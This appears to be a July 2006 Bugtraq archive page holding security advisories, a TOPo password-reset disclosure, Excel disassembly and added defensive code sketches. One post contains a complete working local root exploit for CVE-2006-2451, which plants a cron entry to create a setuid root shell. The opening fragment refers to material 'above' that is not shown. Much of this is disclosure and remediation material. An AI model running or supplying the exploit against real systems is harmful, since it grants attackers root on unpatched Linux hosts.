Moroccan Security Research Team
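A defensive counterpart to the picture.php pattern described above, added here as an illustration; it is not code from Lazarus Guestbook or from the advisory. The weakness discussed is that the existence check and the HTML output each consumed the raw parameter, and a NUL byte made them see different strings. Validating the parameter once, before either use, and escaping whatever is echoed closes that gap. Python with constructed sample values; the directory, the URL and the list of allowed extensions are placeholders chosen for the example.

```python
import html
import os
import re
from typing import Dict, Optional

# Placeholder locations for the demonstration (constructed, not from the advisory).
IMAGE_DIR = "/srv/guestbook/tmp"
BASE_URL = "http://guestbook.example.invalid"

ALLOWED_EXT = {".gif", ".jpg", ".jpeg", ".png"}
# Exactly one plain filename component: no slashes, no leading dot, no odd bytes.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-][A-Za-z0-9_.-]{0,63}$")


def resolve_image(image_dir: str, name: str) -> Optional[str]:
    """Return the absolute path of `name` inside image_dir, or None if rejected.

    The guestbook code ran file_exists() on the raw parameter and then echoed
    the same raw parameter into HTML. With a NUL byte in the value the
    existence check saw a truncated path while the output saw the whole
    string. Validating up front means both later uses see the same, vetted
    value, so there is nothing for the two to disagree about.
    """
    # Control bytes (NUL included) never belong in a filename.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        return None
    # Rejects path separators, "..", hidden files and stray characters in one go.
    if not SAFE_NAME.fullmatch(name) or ".." in name:
        return None
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXT:
        return None
    # Defence in depth: resolve the path and confirm it is still under image_dir.
    base = os.path.realpath(image_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def img_tag(base_url: str, name: str) -> str:
    """Build the <img> tag with the attribute value HTML-escaped."""
    src = "%s/%s" % (base_url, name)
    return '<img src="%s" alt="">' % html.escape(src, quote=True)


def classify_samples() -> Dict[str, bool]:
    """Run constructed sample values through the check; True means accepted."""
    samples = {
        "plain": "photo.gif",
        "traversal": "../img/home.gif",
        "nul_byte": "home.gif\x00x",
        "not_image": "config.php",
        "subdir": "img/home.gif",
    }
    return {label: resolve_image(IMAGE_DIR, value) is not None
            for label, value in samples.items()}


if __name__ == "__main__":
    for label, accepted in classify_samples().items():
        print("%-10s %s" % (label, "accepted" if accepted else "rejected"))
    # Even a name that slipped past validation could not break out of the attribute.
    print(img_tag(BASE_URL, 'a"><b>x</b>.gif'))
```

Only the plain filename is accepted; the traversal, NUL-byte, non-image and subdirectory samples are all rejected before any filesystem or output call, and the escaping in img_tag is an independent second layer rather than the primary control.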


RE: Old vulnerable softwares collection

2006-07-12 Thread John Rigali
Older versions of various freely distributable programs can be found at
OldVersion.com (http://www.oldversion.com/).

--
John Rigali
Information Technology Coordinator
Verbum Dei High School
http://www.verbumdeihs.com/
Working in the Jesuit Tradition

-Original Message-
From: Jerome Athias [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 10, 2006 12:40 AM
To: bugtraq@securityfocus.com
Subject: Old vulnerable softwares collection

Hi,

it's often difficult to find old versions of vulnerable softwares
it's useful to have these old versions to test an exploit, study a 
vulnerability or do a patch analysis...
it's also useful to test a fuzzer, a scanner... for a course or a 
challenge...

so i'm thinking about building a little repository with old versions of 
little softwares (free or trial)

if interested or could help, please visit this page:
https://www.securinfos.info/old_softwares_vulnerable.php

Cheers
/JA


Re: Browser bugs hit IE, Firefox today (SANS)

2006-07-12 Thread 3CO

On 7/4/06, Thor Larholm <[EMAIL PROTECTED]> wrote:

However, reading the contentDocument property of the DOM element instead
of going through the frames collection will give you a reference to the
document object inside the third-party domain and even allow you to
overwrite native DOM methods without throwing a security exception, such
as
document.getElementById("thirdparty").contentDocument.getElementById=function(s){alert(s)}.



This code throws an exception in Firefox 1.5.0.4:
"Error: uncaught exception: Permission denied to set property
HTMLDocument.getElementById
"

Just obtaining a reference to the contentDocument works, but any
action on it throws an error.


S21Sec-032-en: Vulnerability in Fatwire Content Server

2006-07-12 Thread labs
##

 - S21Sec Advisory -

##

Title:   FatWire Content Server
   ID:   S21SEC-032-en
 Severity:   High - Administrative Privileges Escalation
  History:   31.May.2006 Vulnerability discovered
 05.Jun.2006 Fixed (patch available)
Scope:   FatWire Content Server Portal
Platforms:   Any
   Author:   Alberto Moro ([EMAIL PROTECTED])
  URL:   http://www.s21sec.com/avisos/s21sec-032-en.txt
  Release:   Public

[ SUMMARY ]

The FatWire Content Server product suite enables companies to deploy a wide
variety and large quantity of Web sites and content-centric applications
that build customer loyalty, reach new markets, strengthen brand identity,
boost productivity, and reduce costs.


[ AFFECTED VERSIONS ]

The following tested versions are affected by this issue:

- FatWire Content Server 5.5.0 


[ DESCRIPTION ]

It's possible to obtain administrative privileges in the portal without
previous registration or validation.


[ WORKAROUND ]

Upgrade FatWire CS to the last version or apply the patch provided by
vendor.


[ ACKNOWLEDGMENTS ]

These vulnerabilities have been found and researched by:

- Alberto Moro <[EMAIL PROTECTED]> S21Sec

With thanks to:

- Leonardo Nve <[EMAIL PROTECTED]> S21Sec


[ REFERENCES ]

* FatWire Content Server
  http://www.fatwire.com/cs/Satellite/CSPage_US.html

* S21Sec
  http://www.s21sec.com




TOPo v.2.2.178 Account Reset

2006-07-12 Thread darkz . gsa
TOPo v.2.2.178 Account Reset


Author: Attila Gerendi (Darkz)

Date: July 12, 2006

Package: TOPo (http://ej3soft.ej3.net/)

Versions Affected: 2.2.178 (Other versions may also be affected.)

Severity: Password Reset


Description:


 It is possible to override an existing entry by posting a new entry with a 
previous entry ID. 

 The ID can be extracted from the main window links, e.g.:

http://[host]/[path]/index.php?m=top&s=out&ID=1152699749.6695

 The new entry will override the original entry; this also overrides the 
original password.

 Another problem is the ID format xx. where  is the original 
(initial) password.

 

 

Solution:

TOPo development seems to be suspended by now. No new release since January 5, 
2005. 


[SECURITY] [DSA 1108-1] New mutt packages fix arbitrary code execution

2006-07-12 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1108-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
Jul 11th, 2006  http://www.debian.org/security/faq
- --

Package: mutt
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-3242
Debian Bug : 375828

It was discovered that the mutt mail reader performs insufficient
validation of values returned from an IMAP server, which might overflow
a buffer and potentially lead to the injection of arbitrary code.

For the stable distribution (sarge) this problem has been fixed in
version 1.5.9-2sarge2.

For the unstable distribution (sid) this problem has been fixed in
version 1.5.11+cvs20060403-2.

We recommend that you upgrade your mutt package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 


  These files will probably be moved into the stable distribution on
  its next update.

--------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>



Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t Exploit ( BID 18874 / CVE-2006-2451 )

2006-07-12 Thread Roman Medina-Heigl Hernandez

Maybe this is obvious for Paul Starzetz (as well as many other people) but
full-disclosure is not really "full" without exploit code.

Working exploit attached. You can also download it from:
http://www.rs-labs.com/exploitsntools/rs_prctl_kernel.c

Greetz to !dSR ppl :-)

- --

Saludos,
- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
/*****************************************************************************/
/* Local r00t Exploit for:                                                   */
/* Linux Kernel PRCTL Core Dump Handling                                     */
/* ( BID 18874 / CVE-2006-2451 )                                             */
/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)                                   */
/* By:                                                                       */
/* - dreyer    <[EMAIL PROTECTED]>  (main PoC code)                          */
/* - RoMaNSoFt <[EMAIL PROTECTED]>  (local root code)                        */
/*                                                         [ 10.Jul.2006 ]   */
/*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>

/* Crontab fragment carried in the process image so that it is present in
 * the core file written to /etc/cron.d. */
char *payload =
    "\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
    "* * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main(void)
{
    int child;
    struct rlimit corelimit;

    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    /* Allow core files of unlimited size. */
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if (!(child = fork())) {
        /* Child: chdir into /etc/cron.d, set its dumpable flag to 2,
         * then wait to be killed. */
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    /* Parent: force the child to dump core. */
    kill(child, SIGSEGV);

    printf("[*] Sleeping for approx. one minute (** please wait **)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
    system("/tmp/sh -i");
    return 0;
}



NSFOCUS SA2006-04 : Microsoft Office GIF Filter Buffer Overflow Vulnerability

2006-07-12 Thread NSFOCUS Security Team
NSFOCUS Security Advisory (SA2006-04)

Microsoft Office GIF Filter Buffer Overflow Vulnerability

Release Date: 2006-07-12

CVE ID: CVE-2006-0007

http://www.nsfocus.com/english/homepage/research/0604.htm

Affected systems & software
===
Microsoft Office 2000
Microsoft Office XP
Microsoft Office 2003

Unaffected systems & software
===


Summary
=

NSFocus Security Team discovered a buffer overflow vulnerability in the Microsoft
Office GIF filter, which could allow attackers to run arbitrary code via a
carefully crafted GIF image.

Description


GIFIMP32.FLT is a GIF image filter shipped with Microsoft Office, which is
installed by default in %CommonProgramFiles%\Microsoft Shared\Grphflt\GIFIMP32.FLT.

GIFIMP32.FLT contains a buffer overflow vulnerability in the handling of some
malformed GIF images, which allows attackers to run arbitrary code. Any
application that calls GIFIMP32.FLT is affected by this vulnerability. For
example, mspaint.exe will call the filter automatically when opening files in
.gif format if Microsoft Office is installed. Attackers could gain control over
a system by luring users to open a malicious GIF image.

Workaround
=

1. Do not open any GIF image from untrusted sources. 
2. Temporarily remove GIFIMP32.FLT. 

Vendor Status
==

2005.05.27  Informed the vendor
2005.06.02  Vendor confirmed the vulnerability
2006.07.11  Microsoft has released a security bulletin (MS06-039) and related patches.

For more details about the security bulletin, please refer to: 
http://www.microsoft.com/technet/security/bulletin/MS06-039.mspx

Additional Information


The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-0007 to this issue. This is a candidate for inclusion in the 
CVE list (http://cve.mitre.org), which standardizes names for security problems.
Candidates may change significantly before they become official CVE entries.

Acknowledgment
===

Yu Yang of NSFocus Security Team found the vulnerability.

DISCLAIMS
==
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <[EMAIL PROTECTED]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA



[ MDKSA-2006:117-1 ] - Updated libmms packages fix buffer overflow vulnerability

2006-07-12 Thread security


 ___
 
 Mandriva Linux Security Advisory   MDKSA-2006:117-1
 http://www.mandriva.com/security/
 ___
 
 Package : libmms
 Date: July 12, 2006
 Affected: 2006.0
 ___
 
 Problem Description:
 
 Stack-based buffer overflow in MiMMS 0.0.9 allows remote attackers to cause 
 a denial of service (application crash) and possibly execute arbitrary code 
 via the (1) send_command, (2) string_utf16, (3) get_data, and (4) 
 get_media_packet functions, and possibly other functions. Libmms uses the
 same vulnerable code.

 Update:

 The previous update for libmms had an incorrect/incomplete patch. This
 update includes a more complete fix for the issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2200
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



Microsoft Excel Array Index Error Remote Code Execution

2006-07-12 Thread Sowhat

Microsoft Excel Array Index Error Remote Code Execution



By Sowhat of Nevis Labs
2006.07.11

http://www.nevisnetworks.com
http://secway.org/advisory/AD20060711.txt

Vendor
Microsoft Inc.

Products affected:
Microsoft Office 2000 Service Pack 3
Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 1 or Service Pack 2
maybe some others


Remote: YES
Exploitable: YES

CVE: CVE-2006-1306

Overview:

This vulnerability allows remote attackers to execute arbitrary code in
the context of the logged in user. An array boundary condition may be
violated by a malicious .xls file in order to redirect execution into
attacker-supplied data. Exploitation requires that the attacker coerce or
persuade the victim to open a malicious .XLS file.


Details:

The specific flaw exists within the parsing of the BIFF file format used
by Microsoft Excel.


A function pointer is not validated and is insecurely affected by user-supplied
data, thus resulting in code execution.


The disassembly code:


.text:300ABAFC sub_300ABAFC    proc near               ; CODE XREF: sub_3008FEA4+B5p
.text:300ABAFC                                         ; sub_30096EC8-5F2p ...
.text:300ABAFC
.text:300ABAFC arg_0           = dword ptr  4
.text:300ABAFC arg_4           = dword ptr  8
.text:300ABAFC arg_8           = dword ptr  0Ch
.text:300ABAFC
.text:300ABAFC                 mov     eax, [esp+arg_0]
.text:300ABB00                 movsx   ecx, word ptr [eax]   --> [eax] read from the XLS file
.text:300ABB03                 push    [esp+arg_8]
.text:300ABB07                 imul    ecx, 14h
.text:300ABB0A                 push    [esp+4+arg_4]
.text:300ABB0E                 push    eax
.text:300ABB0F                 mov     eax, dword_308792C4   --> [eax]=00e17638, always; maybe different in the language SYSTEM
.text:300ABB14                 call    dword ptr [ecx+eax]   --> Here! call your CODE.
.text:300ABB17                 retn    0Ch
.text:300ABB17 sub_300ABAFC    endp


eax is the index and is always set to 00e17638h(?), and ecx can vary over a
very wide range, so we, the attacker, can plant specific data somewhere and
CALL it.



The supplied data will be used in some operations and, after some calculation
(such as imul), will be used for direct memory access. In this case we can
calculate and specially choose some value which contains data we can control,
which will easily lead to remote code execution.


POC:

No POC will be supplied


Fix:

Microsoft has released an update for Microsoft Office which is
set to address this issue. This can be downloaded from:

http://www.microsoft.com/technet/security/bulletin/MS06-037.mspx


Vendor Response:

2006.05.30 Vendor notified via [EMAIL PROTECTED]
2006.05.30 Vendor responded
2006.07.11 Vendor released MS06-037 patch
2006.07.11 Advisory released


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


   CVE-2006-1306




Reference:

1. http://sc.openoffice.org/excelfileformat.pdf
2. http://www.microsoft.com/technet/security/Bulletin/MS06-037.mspx
3. http://www.microsoft.com/technet/security/Bulletin/MS06-012.mspx
4. http://www.eeye.com/html/research/advisories/AD20051104.html



Greetings to [EMAIL PROTECTED] :)
--
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"
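
The dispatch shown in Sowhat's disassembly above (movsx of a record word, imul by 14h, call through a table) is modelled here as an added example, not code from the advisory or from Microsoft: `vulnerable_offset` computes the byte offset exactly as the unchecked code does, including the sign extension, and `dispatch_checked` shows the bounds check it lacks. The handler table, its size and the sample record fields are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* imul ecx, 14h in the disassembly: each table entry is 0x14 bytes. */
#define ENTRY_SIZE 0x14

/* Little-endian 16-bit field exactly as the BIFF record stores it. */
static uint16_t read_le16(const uint8_t *p)
{
    return (uint16_t)(p[0] | ((uint16_t)p[1] << 8));
}

/* Byte offset the vulnerable code adds to the table base (dword_308792C4):
 * movsx sign-extends the record word, imul scales it by 0x14, and nothing
 * compares the result against the table size. Values >= 0x8000 go negative,
 * so the computed slot can land anywhere before or after the table. */
int32_t vulnerable_offset(const uint8_t *record)
{
    int16_t idx = (int16_t)read_le16(record);   /* movsx ecx, word ptr [eax] */
    return (int32_t)idx * ENTRY_SIZE;           /* imul  ecx, 14h */
}

/* Constructed stand-in for the handler table; the real table's contents are
 * not given in the advisory. */
typedef int (*handler_fn)(void);
static int handler_zero(void) { return 100; }
static int handler_one(void)  { return 101; }
static const handler_fn HANDLERS[] = { handler_zero, handler_one };
#define HANDLER_COUNT (sizeof HANDLERS / sizeof HANDLERS[0])

/* Hardened dispatch: the record field is an unsigned slot number that must be
 * below the table length before it is used. Reading it unsigned also rejects
 * every value movsx would have made negative. Returns the handler's result,
 * or -1 when the slot is out of range. */
int dispatch_checked(const uint8_t *record)
{
    uint16_t slot = read_le16(record);
    if (slot >= HANDLER_COUNT)
        return -1;
    return HANDLERS[slot]();
}

/* Constructed two-byte record fields (little-endian). */
const uint8_t REC_SLOT0[2] = { 0x00, 0x00 };
const uint8_t REC_SLOT1[2] = { 0x01, 0x00 };
const uint8_t REC_LARGE[2] = { 0x34, 0x12 };   /* 0x1234: far past any table  */
const uint8_t REC_NEG[2]   = { 0x00, 0x80 };   /* 0x8000: negative after movsx */

int main(void)
{
    const uint8_t *recs[] = { REC_SLOT0, REC_SLOT1, REC_LARGE, REC_NEG };
    for (size_t i = 0; i < sizeof recs / sizeof recs[0]; i++)
        printf("field=0x%04x  vulnerable offset=%d  checked dispatch=%d\n",
               (unsigned)read_le16(recs[i]), vulnerable_offset(recs[i]),
               dispatch_checked(recs[i]));
    return 0;
}
```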


SMB Information Disclosure Vulnerability

2006-07-12 Thread Avert
___


McAfee, Inc.

McAfee® Avert® Labs Security Advisory

Public Release Date: 2006-07-11


SMB Information Disclosure Vulnerability


CVE-2006-1315

___


•   Synopsis


An information disclosure vulnerability exists in the Server service that could 
allow an attacker to retrieve fragments of memory from an affected host via the 
host’s SMB server. 
___


•   Vulnerable System or Application


Microsoft Windows 2000

Microsoft Windows XP w/ Service Pack 1

Microsoft Windows XP w/ Service Pack 2

Microsoft Windows Server 2003

Microsoft Windows Server 2003 w/ Service Pack 1


___


•   Vulnerability Information


This issue is caused by the Server protocol driver’s failure to zero out memory 
before reusing it when constructing SMB response messages. An attacker could 
exploit this vulnerability by sending a specially crafted request that when 
processed would result in a response packet being sent that unintentionally 
contained portions of memory from the target host. Note that this vulnerability 
would not allow an attacker to execute code or to elevate their user rights 
directly. It could be used to produce useful information to try to further 
compromise the affected system.

___


•   Resolution


Microsoft has released a security bulletin and associated patch for this 
vulnerability:

http://www.microsoft.com/technet/security/Bulletin/MS06-035.mspx 


___


•   Credits


This vulnerability was discovered by Mike Price and Rafal Wojtczuk of McAfee 
Avert Labs. 

___


•   Legal Notice


Copyright (C) 2006 McAfee, Inc.

The information contained within this advisory is provided for the convenience 
of McAfee’s customers, and may be redistributed provided that no fee is charged 
for distribution and that the advisory is not modified in any way. McAfee makes 
no representations or warranties regarding the accuracy of the information 
referenced in this document, or the suitability of that information for your 
purposes.


McAfee, Inc. and McAfee Avert Labs are registered Trademarks of McAfee, Inc. 
and/or its affiliated companies in the United States and/or other Countries.  
All other registered and unregistered trademarks in this document are the sole 
property of their respective owners.
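
The failure mode the McAfee advisory describes, a reused response buffer that is not zeroed before it is populated, as an added example that is not part of the advisory or of any Microsoft code. The response layout, the scratch buffer and the payloads are constructed for the example; the real SMB wire format is not modelled.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed, simplified response: a length word and a fixed-size data
 * field whose full width is always transmitted. */
#define DATA_FIELD 32
struct reply {
    uint32_t length;            /* bytes of data actually filled */
    uint8_t  data[DATA_FIELD];  /* fixed field; the tail goes out regardless */
};

/* One reused scratch buffer, like a server recycling a response allocation. */
static struct reply scratch;

/* The flawed pattern: copy n payload bytes into the reused struct and send
 * all DATA_FIELD bytes. Whatever the previous response left in data[n..]
 * travels with this one. */
const struct reply *build_reply_unsafe(const uint8_t *payload, uint32_t n)
{
    if (n > DATA_FIELD) n = DATA_FIELD;
    scratch.length = n;
    memcpy(scratch.data, payload, n);
    return &scratch;
}

/* The fix: clear the whole response before populating it. */
const struct reply *build_reply_safe(const uint8_t *payload, uint32_t n)
{
    memset(&scratch, 0, sizeof scratch);
    if (n > DATA_FIELD) n = DATA_FIELD;
    scratch.length = n;
    memcpy(scratch.data, payload, n);
    return &scratch;
}

/* Detection-side check: count non-zero bytes beyond the declared length.
 * Anything above 0 is memory the sender never meant to disclose. */
int leaked_bytes(const struct reply *r)
{
    int count = 0;
    for (uint32_t i = r->length; i < DATA_FIELD; i++)
        if (r->data[i] != 0) count++;
    return count;
}

/* Scenario: a large first response leaves content in the buffer, then a
 * small second response reuses it. Returns the number of leaked bytes. */
int leak_after_reuse(int use_safe)
{
    uint8_t first[DATA_FIELD];
    memset(first, 'S', sizeof first);           /* constructed sensitive content */
    const uint8_t second[4] = { 1, 2, 3, 4 };   /* constructed short reply */
    if (use_safe) {
        build_reply_safe(first, sizeof first);
        return leaked_bytes(build_reply_safe(second, sizeof second));
    }
    build_reply_unsafe(first, sizeof first);
    return leaked_bytes(build_reply_unsafe(second, sizeof second));
}

int main(void)
{
    printf("unsafe reuse leaks %d bytes\n", leak_after_reuse(0));
    printf("zeroed reuse leaks %d bytes\n", leak_after_reuse(1));
    return 0;
}
```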



Fuzzing Microsoft Office

2006-07-12 Thread naveed

Last Friday I posted a POC regarding the Microsoft Office mso.dll
boundary condition error. I had checked the code flow of mso_203 and
it was producing access violation errors, which I sent to Bugtraq
and FD. Microsoft's MSRC blog has been updated at
http://blogs.technet.com/msrc/archive/2006/07/10/441006.aspx stating
that the vulnerability is not remotely exploitable, which is true.
However, while checking a bunch of fuzzed documents several other
problems have been noticed, and other people have reported issues
with different Office applications. Some of them were able to
reproduce the issue; some are exploitable, others may not be.
Microsoft Office vulnerabilities are not new, but recently interest
has increased. It has been noticed that people fuzz the documents and
afterwards don't know which type of error it is or whether the
vulnerability is exploitable or not! Just note how many 0-days have
been reported in the past few months in MS Office products. It is
interesting to see that most of these vulnerabilities are directly or
indirectly related to fuzzing and/or changing the normal behavior of
documents.

If we take the example of the recently discovered HLINK.DLL buffer
overflow flaw, kcope, who reported it, used Perl's Excel worksheet
generator to generate a long URL string in the worksheet.
Interestingly, Microsoft Office does not allow you to generate
hyperlinks with such long strings (usually restricted to 256 bytes);
even OLE automation restricts you, but Microsoft's binary file format
does not have such restrictions for "hyperlink" objects. Maybe it was
assumed that the library is safe since Office does not allow users to
have such nasty URLs.

Generating the specially crafted files is not a big issue. It was
assumed that one should know the binary file format in order to
generate a "valid document" (one which is parsable by the
applications), but the Perl library is just an example; nanika posted
another style sheet flaw in MS Excel which looks like the result of an
exercise with the same library.

A few days back the same exploit was released for MS Word. It is also
interesting that 3rd party libraries are not that restrictive when
producing MS Office compatible files; they allow you to do some really
funny stuff. For example, it is an open question why OpenOffice
developers decided to accept a URL string of, say, 20,000 bytes
(perhaps of indefinite length). One can easily identify new problems
while experimenting with this stuff.


-
Naveed Afzal


rPSA-2006-0128-1 samba samba-swat

2006-07-12 Thread Justin M. Forbes
rPath Security Advisory: 2006-0128-1
Published: 2006-07-11
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Remote Deterministic Denial of Service
Updated Versions:
samba=/[EMAIL PROTECTED]:devel//1/3.0.23-1-0.1
samba-swat=/[EMAIL PROTECTED]:devel//1/3.0.23-1-0.1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3403
https://issues.rpath.com/browse/RPL-496

Description:
In previous versions of the samba package, a remote attacker can
cause samba to consume all system memory, leading to a denial of
service.


Cisco Security Advisory: Cisco Intrusion Prevention System Malformed Packet Denial of Service

2006-07-12 Thread Cisco Systems Product Security Incident Response Team


Cisco Security Advisory: Cisco Intrusion Prevention System Malformed
Packet Denial of Service

Advisory ID: cisco-sa-20060712-ips

http://www.cisco.com/warp/public/707/cisco-sa-20060712-ips.shtml

Revision 1.0

For Public Release 2006 July 12 1600 UTC (GMT)

- -

Contents


Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- -

Summary
===

Cisco Intrusion Prevention System (IPS) software version 5.1 is
vulnerable to a denial of service condition caused by a malformed
packet, which may result in an IPS device becoming inaccessible
remotely or via the console and fail to process packets. A power
reset is required to recover the IPS device. There are no workarounds
for this vulnerability.

Cisco has made free software available to address this vulnerability
for affected customers.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20060712-ips.shtml

Affected Products
=

Vulnerable Products
+------------------

Cisco Intrusion Prevention System 42xx appliances running IPS
software versions 5.1(1), 5.1(1a), 5.1(1b), 5.1(1c), 5.1(1d), 5.1(1e)
or 5.1(p1).

IPS software versions 5.1(1a), 5.1(1b), 5.1(1c), 5.1(1d) and 5.1(1e)
are repackaged versions of 5.1(1) created to fix various installation
problems. All 5.1(1) patch versions report 5.1(1) as the installed
version.

Note: Some IDS/IPS appliances shipped before IPS software version 5.0
was available and have model numbers starting with IDS, not IPS.

The following 42xx appliances are potentially affected.

  * IDS-4235
  * IPS-4240
  * IDS-4250-SX
  * IDS-4250-TX
  * IDS-4250-XL (4250 with XL accelerator card)
  * IPS-4255

Products Confirmed Not Vulnerable
+--------------------------------

All devices running Cisco Intrusion Detection Systems (IDS) software
versions 4.x or IPS versions 5.0(x).

Additionally, the following devices are not vulnerable even if
running IPS software versions 5.1(1), 5.1(1a), 5.1(1b), 5.1(1c), 5.1
(1d), 5.1(1e) or 5.1(1p1).

  * NM-CIDS
  * IDSM-2
  * ASA-SSM-AIP-10
  * ASA-SSM-AIP-20
  * IDS-4210
  * IDS-4215

The following devices do not support IPS software version 5.1 and are
not vulnerable.

  * IDS-4220
  * IDS-4230

To determine the version of software running an IPS device, log into
the IPS device using an SSH client and issue the command show version.

sensor# show version
Application Partition:
Cisco Intrusion Prevention System, Version 5.1(1p1)S215.0


Details
===

Cisco Intrusion Prevention Systems (IPS) are a family of network
security devices that provide network based threat prevention
services. A vulnerability exists in the custom device driver for
Intel-based gigabit network adapters used to process packets received
by the sensing interfaces of certain IPS devices. A malformed IP
packet received on an Intel-based gigabit network adapter configured
for use as a sensing interface may result in the IPS device
experiencing a kernel panic. Affected IPS devices will cease
processing packets, producing alerts, performing automated actions
such as logging, and become inaccessible remotely or via the console.

If deployed as an inline device, the IPS will also stop forwarding
packets between interfaces and may cause a network outage. IPS
devices configured to use the auto-bypass feature will also fail to
forward packets. Attackers may use this vulnerability to disable an
IPS device to hide malicious activity. This vulnerability only
affects certain IPS devices configured to use Intel-based gigabit
network adapters as sensing interfaces. IPS devices configured to use
an Intel-based gigabit network adapter as a management interface are
not affected by this vulnerability. A power reset is required to
recover the IPS device.

This vulnerability is documented in Cisco bug ID CSCsd36590 (registered
customers only).

Impact
==

Successful exploitation of the vulnerability may result in the
failure of an IPS device to operate as expected. Affected devices
will become inaccessible remotely or via the console and stop
processing packets. If deployed as an inline device, an IPS device
will stop forwarding packets, including devices configured to use the
auto-bypass feature. This may result in a network outage. A power
reset is required to recover the IPS device.

Software Version and Fixes
==

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to

[USN-314-1] samba vulnerability

2006-07-12 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-314-1  July 12, 2006
samba vulnerability
CVE-2006-3403
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  samba                           3.0.10-1ubuntu3.1

Ubuntu 5.10:
  samba                           3.0.14a-6ubuntu1.1

Ubuntu 6.06 LTS:
  samba                           3.0.22-1ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

The Samba security team reported a Denial of Service vulnerability in
the handling of information about active connections. In certain
